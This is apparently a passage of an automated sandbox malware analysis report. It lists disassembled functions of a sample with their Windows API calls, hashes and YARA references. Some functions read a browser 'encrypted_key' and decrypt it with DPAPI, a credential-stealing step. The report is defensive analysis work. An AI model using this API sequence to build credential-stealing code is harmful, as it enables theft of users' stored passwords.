                                    • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                    • Instruction ID: ca0b3f8bb7031a09c1db49281ea4655532db272b27dcfd858292b368ea5ceea3
                                    • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                    • Instruction Fuzzy Hash: C5016DB0941348FAEF20DBD1CC8AB9DBBB9AB05705F608448F705BB2C1E7B89941C765
                                    Function 007EA077 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 167memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • memcmp.MSVCRT(?,00421264,00000003), ref: 007EA094
                                      • Part of subcall function 007FAA07: lstrcpy.KERNEL32(?,00000000), ref: 007FAA4D
                                      • Part of subcall function 007F0CC7: memset.MSVCRT ref: 007F0E83
                                      • Part of subcall function 007F0CC7: lstrcat.KERNEL32(?,00000000), ref: 007F0E9C
                                      • Part of subcall function 007F0CC7: lstrcat.KERNEL32(?,00420D7C), ref: 007F0EAE
                                      • Part of subcall function 007F0CC7: lstrcat.KERNEL32(?,00000000), ref: 007F0EC4
                                      • Part of subcall function 007F0CC7: lstrcat.KERNEL32(?,00420D80), ref: 007F0ED6
                                      • Part of subcall function 007FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 007FA9EF
                                    • memcmp.MSVCRT(?,00421114,00000003), ref: 007EA116
                                    • memset.MSVCRT ref: 007EA14F
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 007EA1A8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
                                    • String ID: @
                                    • API String ID: 1977917189-2766056989
                                    • Opcode ID: 20785839e506e71d0d4179be974b45f7974db19f2062455c4e4fb0a2237278dd
                                    • Instruction ID: 70245787e5891b3a6f941c1b5da7b46e658a2af7cadd933f08f647828f24f36f
                                    • Opcode Fuzzy Hash: 20785839e506e71d0d4179be974b45f7974db19f2062455c4e4fb0a2237278dd
                                    • Instruction Fuzzy Hash: B3615070600288EBCB14EFA5CD9AFED7775AF54304F408128FA096B691DB786A05CB52
                                    Function 00410D90 Relevance: 7.6, APIs: 5, Instructions: 120stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • strtok_s.MSVCRT ref: 00410DB8
                                    • strtok_s.MSVCRT ref: 00410EFD
                                      • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00A12D90,?,0042110C,?,00000000), ref: 0041A82B
                                      • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: strtok_s$lstrcpylstrlen
                                    • String ID:
                                    • API String ID: 348468850-0
                                    • Opcode ID: d0f1ba5d55cb1b253890ed9ee11e6a313e4eedd3fb9c312bac6e1a9e739fb82b
                                    • Instruction ID: a77fe6eef144f8be1650d890f93c6b8163d42d0b0f361fe6991083760d0b9acb
                                    • Opcode Fuzzy Hash: d0f1ba5d55cb1b253890ed9ee11e6a313e4eedd3fb9c312bac6e1a9e739fb82b
                                    • Instruction Fuzzy Hash: 91517FB4A40209EFCB08CF95D595AEE77B5FF44308F10805AE802AB351D774EAD1CB95
                                    Function 00409CE0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 97COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                      • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                      • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                      • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                      • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                      • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                      • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                    • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
                                      • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                      • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                      • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                      • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                    • memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92
                                      • Part of subcall function 00409B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
                                      • Part of subcall function 00409B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
                                      • Part of subcall function 00409B60: memcpy.MSVCRT(?,?,?), ref: 00409BC6
                                      • Part of subcall function 00409B60: LocalFree.KERNEL32(?), ref: 00409BD3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmpmemcpy
                                    • String ID: $"encrypted_key":"$DPAPI
                                    • API String ID: 3731072634-738592651
                                    • Opcode ID: b97104fd662995cfad6d6c7205974953a7702af5bf03f7cdde88330e3a2931d4
                                    • Instruction ID: 5ad523267ed72994677b79ea1d9dce7d7822fbf486e040e59600fa97cf483dfd
                                    • Opcode Fuzzy Hash: b97104fd662995cfad6d6c7205974953a7702af5bf03f7cdde88330e3a2931d4
                                    • Instruction Fuzzy Hash: D53155B5D10109ABCB04EBE4DC85AEF77B8BF44304F14452AE915B7282E7389E04CBA5
                                    Function 007FCDA0 Relevance: 7.6, APIs: 5, Instructions: 94COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CodeInfoPageValidmemset
                                    • String ID:
                                    • API String ID: 703783727-0
                                    • Opcode ID: a2b74ec6b56f4fd1bb42d268d048981a4065a41abb9520184a3cb1684c992875
                                    • Instruction ID: 09923d6f87a976371f77098e8723dae9218e047a0afbcff4c8fc60bf3382b9ba
                                    • Opcode Fuzzy Hash: a2b74ec6b56f4fd1bb42d268d048981a4065a41abb9520184a3cb1684c992875
                                    • Instruction Fuzzy Hash: 3131F631A0429D9EEB278F74C995279BFA49B06310B1881BADA81CF392C32CC805D761
                                    Function 007F6B87 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetSystemTime.KERNEL32(?), ref: 007F6BD3
                                    • sscanf.NTDLL ref: 007F6C00
                                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 007F6C19
                                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 007F6C27
                                    • ExitProcess.KERNEL32 ref: 007F6C41
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Time$System$File$ExitProcesssscanf
                                    • String ID:
                                    • API String ID: 2533653975-0
                                    • Opcode ID: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
                                    • Instruction ID: 53feaca4b7399fe4290eb2aaa454a437166842b1a6b690f22fd427fbc4518e1b
                                    • Opcode Fuzzy Hash: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
                                    • Instruction Fuzzy Hash: 782197B5D1420DABDF08EFE4D9499EEB7B6FF48300F04852EE516A3250EB345609CB65
                                    Function 007F8067 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007F809E
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 007F80A5
                                    • RegOpenKeyExA.ADVAPI32(80000002,0064A1D4,00000000,00020119,?), ref: 007F80C5
                                    • RegQueryValueExA.ADVAPI32(?,0064A4EC,00000000,00000000,000000FF,000000FF), ref: 007F80E6
                                    • RegCloseKey.ADVAPI32(?), ref: 007F80F9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID:
                                    • API String ID: 3225020163-0
                                    • Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                    • Instruction ID: 8374cb2c6c0d964a279969f0299b164136e52a007c8cdbb75c41d6b63bc93bdf
                                    • Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                    • Instruction Fuzzy Hash: AD113DB5A84209BBD710CFD4DD4AFBBB7B9EB05710F104219F615A7280CBB958018BA2
                                    Function 00417E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417E37
                                    • HeapAlloc.KERNEL32(00000000), ref: 00417E3E
                                    • RegOpenKeyExA.ADVAPI32(80000002,00A15568,00000000,00020119,?), ref: 00417E5E
                                    • RegQueryValueExA.ADVAPI32(?,00A1A100,00000000,00000000,000000FF,000000FF), ref: 00417E7F
                                    • RegCloseKey.ADVAPI32(?), ref: 00417E92
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocCloseOpenProcessQueryValue
                                    • String ID:
                                    • API String ID: 3466090806-0
                                    • Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                    • Instruction ID: f35b37edc560d93cca1bbeb044924e1a71a0ba88b9c12cde0d27c4035fcf8d53
                                    • Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                    • Instruction Fuzzy Hash: 01114CB5A84205FFD710CFD4DD4AFBBBBB9EB09B10F10425AF605A7280D77858018BA6
                                    Function 007F7987 Relevance: 7.5, APIs: 5, Instructions: 42registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007F799B
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 007F79A2
                                    • RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,007F7920), ref: 007F79C2
                                    • RegQueryValueExA.ADVAPI32(007F7920,00420AAC,00000000,00000000,?,000000FF), ref: 007F79E1
                                    • RegCloseKey.ADVAPI32(007F7920), ref: 007F79EB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID:
                                    • API String ID: 3225020163-0
                                    • Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                    • Instruction ID: 9f63a512195a09bc3171f15d9dedd23421a4052c5d76742f3c15c9146b38a6f4
                                    • Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                    • Instruction Fuzzy Hash: 1C01F4B9A40308FFEB10DFE4DC4AFAEB7B9EB48701F104559FA05A7281D67555008F52
                                    Function 00419260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • StrStrA.SHLWAPI(00A194C0,?,?,?,0041140C,?,00A194C0,00000000), ref: 0041926C
                                    • lstrcpyn.KERNEL32(0064AB88,00A194C0,00A194C0,?,0041140C,?,00A194C0), ref: 00419290
                                    • lstrlenA.KERNEL32(?,?,0041140C,?,00A194C0), ref: 004192A7
                                    • wsprintfA.USER32 ref: 004192C7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpynlstrlenwsprintf
                                    • String ID: %s%s
                                    • API String ID: 1206339513-3252725368
                                    • Opcode ID: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                    • Instruction ID: a59194731e19cd62a1114d9db51b1d7a77f87ed08144ed5303bdb74f02b8d175
                                    • Opcode Fuzzy Hash: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                    • Instruction Fuzzy Hash: FD010879580108FFCB04DFECC998EAE7BBAEB49394F108548F9098B300C635AA40DB95
                                    Function 007E1507 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007E151B
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 007E1522
                                    • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 007E153E
                                    • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 007E155C
                                    • RegCloseKey.ADVAPI32(?), ref: 007E1566
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID:
                                    • API String ID: 3225020163-0
                                    • Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                    • Instruction ID: 6493d943b9a641cc3bb5d2b15fac7e3eb748eb6d6b961193582730ab7bf5b00e
                                    • Opcode Fuzzy Hash: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                    • Instruction Fuzzy Hash: 500131BDA40208BFDB10DFE0DC49FAEB7BDEB48701F008159FA0597280D6749A018F91
                                    Function 004012A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                    • HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                    • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                    • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                    • RegCloseKey.ADVAPI32(?), ref: 004012FF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocCloseOpenProcessQueryValue
                                    • String ID:
                                    • API String ID: 3466090806-0
                                    • Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                    • Instruction ID: a780f69aac564b2d92452564e57f3177c1920ebdf93c56c18a8360c70aaf8c3d
                                    • Opcode Fuzzy Hash: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                    • Instruction Fuzzy Hash: 000131BDA40208BFDB10DFE0DC49FAEB7BDEB48701F008159FA05A7280D6749A018F51
                                    Function 007FC9A9 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • __getptd.LIBCMT ref: 007FC9B5
                                      • Part of subcall function 007FC206: __getptd_noexit.LIBCMT ref: 007FC209
                                      • Part of subcall function 007FC206: __amsg_exit.LIBCMT ref: 007FC216
                                    • __getptd.LIBCMT ref: 007FC9CC
                                    • __amsg_exit.LIBCMT ref: 007FC9DA
                                    • __lock.LIBCMT ref: 007FC9EA
                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 007FC9FE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                    • String ID:
                                    • API String ID: 938513278-0
                                    • Opcode ID: 9141d4d236c8230aa4afe5b4a9d8ccb2514574f5d49c72fbeb20a3e596f06de6
                                    • Instruction ID: 4daa7afcfbaf9d15a5c2be528d0acbbb8800b42092ae4353feb425046886aef3
                                    • Opcode Fuzzy Hash: 9141d4d236c8230aa4afe5b4a9d8ccb2514574f5d49c72fbeb20a3e596f06de6
                                    • Instruction Fuzzy Hash: 4BF0963294431CDBD722F7A89A0B73D33A0BF00724F10410AF614A63D2DB6D6940DB6A
                                    Function 0041C742 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • __getptd.LIBCMT ref: 0041C74E
                                      • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                                      • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                                    • __getptd.LIBCMT ref: 0041C765
                                    • __amsg_exit.LIBCMT ref: 0041C773
                                    • __lock.LIBCMT ref: 0041C783
                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 0041C797
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                    • String ID:
                                    • API String ID: 938513278-0
                                    • Opcode ID: 97b8e5648014eb75fe7e4c2f5c52bbac28816c25018f37e92348e0e4551f1163
                                    • Instruction ID: 4c6ecd523783b942696bdc62fd612c852c6eee159b5b032e672b771ca3e86784
                                    • Opcode Fuzzy Hash: 97b8e5648014eb75fe7e4c2f5c52bbac28816c25018f37e92348e0e4551f1163
                                    • Instruction Fuzzy Hash: B0F09632A813119BD7207BB95C467DE33A09F00728F24414FF414A62D2CBAC59D28E9E
                                    Function 00410740 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 217COMMON
                                    Download Yara Rule
                                    APIs
                                    • StrCmpCA.SHLWAPI(00000000,00A12F10), ref: 0041079A
                                    • StrCmpCA.SHLWAPI(00000000,00A12F90), ref: 00410866
                                    • StrCmpCA.SHLWAPI(00000000,00A12FD0), ref: 0041099D
                                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy
                                    • String ID: `_A
                                    • API String ID: 3722407311-2339250863
                                    • Opcode ID: f37fb10c9b6cf1a1dec8b5cf94e4c42fd659044f66138d1cb817d3683c15b997
                                    • Instruction ID: 94d948ae3f98129d28702617e668470e7ead908e0178ded6cd69974dbc9b1d9a
                                    • Opcode Fuzzy Hash: f37fb10c9b6cf1a1dec8b5cf94e4c42fd659044f66138d1cb817d3683c15b997
                                    • Instruction Fuzzy Hash: 3991C975A101089FCB28EF65D991BED77B5FF94304F40852EE8099F281DB349B46CB86
                                    Function 00410765 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 197COMMON
                                    Download Yara Rule
                                    APIs
                                    • StrCmpCA.SHLWAPI(00000000,00A12F10), ref: 0041079A
                                    • StrCmpCA.SHLWAPI(00000000,00A12F90), ref: 00410866
                                    • StrCmpCA.SHLWAPI(00000000,00A12FD0), ref: 0041099D
                                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy
                                    • String ID: `_A
                                    • API String ID: 3722407311-2339250863
                                    • Opcode ID: b5689747017d0b1233e39e7abd20f6e68fcc7440175b3c06aa4901425a035c35
                                    • Instruction ID: eaeb4c1bfeb24d12610814888c89f1e8d39eb2be5be33b2b9933dc38047eb686
                                    • Opcode Fuzzy Hash: b5689747017d0b1233e39e7abd20f6e68fcc7440175b3c06aa4901425a035c35
                                    • Instruction Fuzzy Hash: 6081BA75B101049FCB18EF65C991AEDB7B6FF94304F50852EE8099F281DB349B46CB86
                                    Function 007F6897 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 007F68CA
                                      • Part of subcall function 007FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 007FA9EF
                                      • Part of subcall function 007FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 007FAC2C
                                      • Part of subcall function 007FAC17: lstrcpy.KERNEL32(00000000), ref: 007FAC6B
                                      • Part of subcall function 007FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 007FAC79
                                      • Part of subcall function 007FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 007FAB6C
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 007F698D
                                    • ExitProcess.KERNEL32 ref: 007F69BC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                    • String ID: <
                                    • API String ID: 1148417306-4251816714
                                    • Opcode ID: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
                                    • Instruction ID: 788e60f0215996025dbcd51ac03d864e32c65247ae2ba0bd2e93a4334f9641c7
                                    • Opcode Fuzzy Hash: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
                                    • Instruction Fuzzy Hash: 4731F8F5901218EADB14EB90DD9AFEDB779AF04300F404199F30966291DF786B48CF5A
